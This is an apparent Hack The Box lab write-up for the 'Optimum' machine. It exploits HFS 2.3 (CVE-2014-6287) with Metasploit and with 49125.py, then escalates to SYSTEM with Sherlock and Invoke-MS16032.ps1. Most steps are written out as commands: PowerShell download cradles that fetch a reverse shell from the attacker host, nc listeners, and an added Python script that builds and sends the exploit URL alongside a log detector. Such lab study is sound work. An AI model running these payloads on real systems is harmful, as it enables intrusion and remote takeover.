Optimum_HTB
Overview
- Optimum is a beginner-level machine that focuses mainly on enumerating services with known exploits. Both exploits are easy to obtain and each has an associated Metasploit module.
SCAN
```bash
┌──(kali㉿kali)-[~/Optimum]
└─$ nmap -T4 -Pn -sV -sC 10.10.10.8
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-29 06:01 EST
Nmap scan report for 10.10.10.8
Host is up (0.25s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.89 seconds
```
Initial Access
- Following the official write-up, first just try it with msfconsole.
```bash
msf6 > search cve:2014-6287

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec

msf6 > use exploit/windows/http/rejetto_hfs_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > set rhost 10.10.10.8
rhost => 10.10.10.8
msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost 10.10.16.2
lhost => 10.10.16.2
msf6 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.16.2:4444
[*] Using URL: http://10.10.16.2:8080/ItO77Cfstcbu
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /ItO77Cfstcbu
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\uFrIskMYSOxH.vbs' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.16.2:4444
[*] Using URL: http://10.10.16.2:8080/ikwLnccTo
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /ikwLnccTo
[*] Sending stage (175686 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\DlvjNW.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.16.2:4444 -> 10.10.10.8:49167) at 2023-12-28 23:31:32 -0500
[*] Server stopped.

meterpreter > getuid
Server username: OPTIMUM\kostas
meterpreter >
```
- It landed on the second attempt.
- The cause of the first failure is unknown.
Things stopped working from this point on, so I start over.
Initial Access
Reverse shell using Invoke-PowerShellTcp.ps1
- Invoke-PowerShellTcp.ps1 (from nishang)
- Serve the folder containing it with Python:
```bash
python3 -m http.server 8080
```
- Listen with nc in another terminal:
```bash
┌──(kali㉿kali)-[~/Optimum]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
```
- In yet another terminal, run 49125.py, the exploit for this vulnerability (CVE-2014-6287).
- I confirmed that HFS is running as a 32-bit process, so account for that: PowerShell is launched through C:\WINDOWS\Sysnative, the alias a 32-bit process can use to reach the 64-bit System32 instead of being redirected to SysWOW64.
```bash
┌──(kali㉿kali)-[~/Optimum]
└─$ python3 49125.py 10.10.10.8 80 "C:\WINDOWS\Sysnative\WindowsPowerShell\v1.0\powershell.exe iex(new-object net.webclient).downloadstring('http://10.10.16.4:8080/Invoke-PowerShellTcp.ps1')"
http://10.10.10.8:80/?search=%00{.+exec|C%3A%5CWINDOWS%5CSysnative%5CWindowsPowerShell%5Cv1.0%5Cpowershell.exe%20iex%28new-object%20net.webclient%29.downloadstring%28%27http%3A//10.10.16.4%3A8080/Invoke-PowerShellTcp.ps1%27%29.}
```
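The URL printed above is the whole exploit: HFS 2.3 evaluates its own macro language (`{.exec|<command>.}`) and strips macros from the search parameter with a regular expression, but a leading NUL byte (`%00`) terminates that regex early, so the macro survives the filter and is executed. The following is an added example, not code from the write-up or from 49125.py: it rebuilds the request on the attacker side and, on the defender side, flags such requests in web-server logs. The host, ports, command and log lines are constructed for the example.

```python
"""Added example, not code from the original write-up or from 49125.py: build the
CVE-2014-6287 request that 49125.py sends to HFS 2.3, and flag such requests in
web-server logs.  The target, ports, command and log lines are constructed.
"""
import re
import urllib.parse
import urllib.request
from typing import List, Optional, Tuple

# The command the write-up passes to 49125.py (a PowerShell download cradle).
PAGE_COMMAND = (
    r"C:\WINDOWS\Sysnative\WindowsPowerShell\v1.0\powershell.exe "
    r"iex(new-object net.webclient).downloadstring('http://10.10.16.4:8080/Invoke-PowerShellTcp.ps1')"
)


def build_hfs_exec_url(host: str, port: int, command: str) -> str:
    """Return the URL that 49125.py prints and requests: a NUL byte, then the exec macro."""
    # quote() leaves '/' unescaped by default, which is exactly what the write-up shows.
    encoded = urllib.parse.quote(command)
    return f"http://{host}:{port}/?search=%00{{.+exec|{encoded}.}}"


def fire(url: str, timeout: float = 5.0) -> int:
    """Send the request and return the HTTP status (lab use only)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.status


def hfs_macro_injection(request_target: str) -> Optional[str]:
    """Detection side: say why a request target looks like HFS macro injection, or return None."""
    query = urllib.parse.urlsplit(request_target).query
    decoded = urllib.parse.unquote(query)  # %00 -> NUL, %7B -> '{', ...; '+' is left alone
    if "{." in decoded and ".}" in decoded:
        if "\x00" in decoded:
            return "HFS macro with NUL-byte filter bypass (CVE-2014-6287)"
        return "HFS macro in query string"
    return None


# Constructed access-log lines in common log format (HFS's own log layout differs).
SAMPLE_LOG = """\
10.10.16.4 - - [29/Dec/2023:06:05:11 -0500] "GET / HTTP/1.1" 200 1538
10.10.16.4 - - [29/Dec/2023:06:05:20 -0500] "GET /?search=readme HTTP/1.1" 200 210
10.10.16.4 - - [29/Dec/2023:06:06:02 -0500] "GET /?search=%00{.+exec|calc.exe.} HTTP/1.1" 200 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def flag_requests(log_text: str) -> List[Tuple[str, str]]:
    """Return (request_target, reason) for every logged request that carries an HFS macro."""
    hits: List[Tuple[str, str]] = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reason = hfs_macro_injection(m.group(1))
        if reason:
            hits.append((m.group(1), reason))
    return hits


if __name__ == "__main__":
    print(build_hfs_exec_url("10.10.10.8", 80, PAGE_COMMAND))
    for target, reason in flag_requests(SAMPLE_LOG):
        print(f"ALERT {reason}: {target}")
```

The detector decodes percent-encoding but deliberately does not treat `+` as a space, so the `{.+exec|` form the exploit uses is matched literally; a NUL byte inside a query string is itself a strong signal, since no legitimate search would contain one.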
Privilege Escalation
- Vulnerability check using Sherlock.ps1
- Append the call so that every check is run:
```bash
echo "Find-AllVulns" >> Sherlock.ps1
```
- Serve it:
```bash
python3 -m http.server 8080
```
- Run it on the target:
```powershell
PS C:\Users\kostas\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.16.2:8080/Sherlock.ps1')

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable

PS C:\Users\kostas\Desktop>
```
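Three entries come back as "Appears Vulnerable" (MS16-032, MS16-034, MS16-135); the "Not supported on 64-bit systems" entries were skipped, not cleared. The following is an added example, not part of the write-up or of Sherlock itself: it parses the Find-AllVulns output into structured findings so that triage can be automated. `SAMPLE` is a trimmed copy of the output above; the handling of Sherlock's `2016-0093/94/95/96` shorthand is an assumption about its format (a run of sequential IDs written with only the trailing digits).

```python
"""Added example, not part of the original write-up or of Sherlock itself: parse
Sherlock's Find-AllVulns output into structured findings and list the bulletins it
marks 'Appears Vulnerable'.  SAMPLE is a trimmed copy of the output in the write-up.
"""
import re
from typing import Dict, List

SAMPLE = """\
Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable
"""

# One CVE field entry: YYYY-NNNN optionally followed by /NN shorthand suffixes.
CVE_FIELD_RE = re.compile(r"^(\d{4})-(\d+)((?:/\d+)*)$")
# One "Key : value" line of a Sherlock record.
RECORD_LINE_RE = re.compile(r"^(\w+)\s*:\s*(.*?)\s*$")


def expand_cves(field: str) -> List[str]:
    """'2016-0093/94/95/96' -> CVE-2016-0093 .. CVE-2016-0096; '2010-3338, 2010-3888' -> two CVEs.

    The '/94' shorthand is assumed to replace the trailing digits of the first ID."""
    cves: List[str] = []
    for chunk in re.split(r"\s*,\s*", field.strip()):
        m = CVE_FIELD_RE.match(chunk)
        if not m:  # empty field or 'N/A'
            continue
        year, first, rest = m.groups()
        cves.append(f"CVE-{year}-{first}")
        for suffix in rest.split("/")[1:]:
            cves.append(f"CVE-{year}-{first[:len(first) - len(suffix)]}{suffix}")
    return cves


def parse_sherlock(text: str) -> List[Dict[str, object]]:
    """Split the output into one dict per finding; a new 'Title' line starts the next record."""
    findings: List[Dict[str, object]] = []
    current: Dict[str, object] = {}
    for line in text.splitlines():
        m = RECORD_LINE_RE.match(line)
        if not m:
            continue
        key, value = m.groups()
        if key == "Title" and current:
            findings.append(current)
            current = {}
        current[key] = value
    if current:
        findings.append(current)
    for f in findings:
        f["CVEs"] = expand_cves(str(f.get("CVEID", "")))
    return findings


def appears_vulnerable(text: str) -> List[str]:
    """Bulletins Sherlock marks 'Appears Vulnerable'.  'Not supported on 64-bit systems'
    means the check was skipped, not that the host is patched, so it is not listed here."""
    return [str(f["MSBulletin"]) for f in parse_sherlock(text)
            if f.get("VulnStatus") == "Appears Vulnerable"]


if __name__ == "__main__":
    for finding in parse_sherlock(SAMPLE):
        print(finding["MSBulletin"], finding["VulnStatus"], finding["CVEs"])
    print("candidates:", appears_vulnerable(SAMPLE))
```

Keeping the skipped 32-bit-only checks out of the candidate list matters on a 64-bit host like this one: they say nothing about patch level, and a second pass with a 64-bit-aware tool would be needed to rule them in or out.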
Invoke-MS16032.ps1
- Use Invoke-MS16032.ps1 to obtain SYSTEM.
```bash
# Serve from the directory that contains Invoke-MS16032.ps1
┌──(kali㉿kali)-[~/Optimum/oscp_notes/MS16-032 drivers eop]
└─$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/)

# Edit Invoke-PowerShellTcp.ps1 to call back on a port different from the first reverse shell, and serve it separately
┌──(kali㉿kali)-[~/Optimum/nishang/Shells]
└─$ python3 -m http.server 3434
Serving HTTP on 0.0.0.0 port 3434 (http://0.0.0.0:3434/) ...
```
```powershell
# In the terminal that holds the reverse shell
PS C:\Users\kostas\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.16.4:8080/Invoke-MS16032.ps1')
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[!] Holy handle leak Batman, we have a SYSTEM shell!!
```
## Reverse shell listener
```bash
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.8] 49183
Windows PowerShell running as user OPTIMUM$ on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop>whoami
nt authority\system
```
Discussion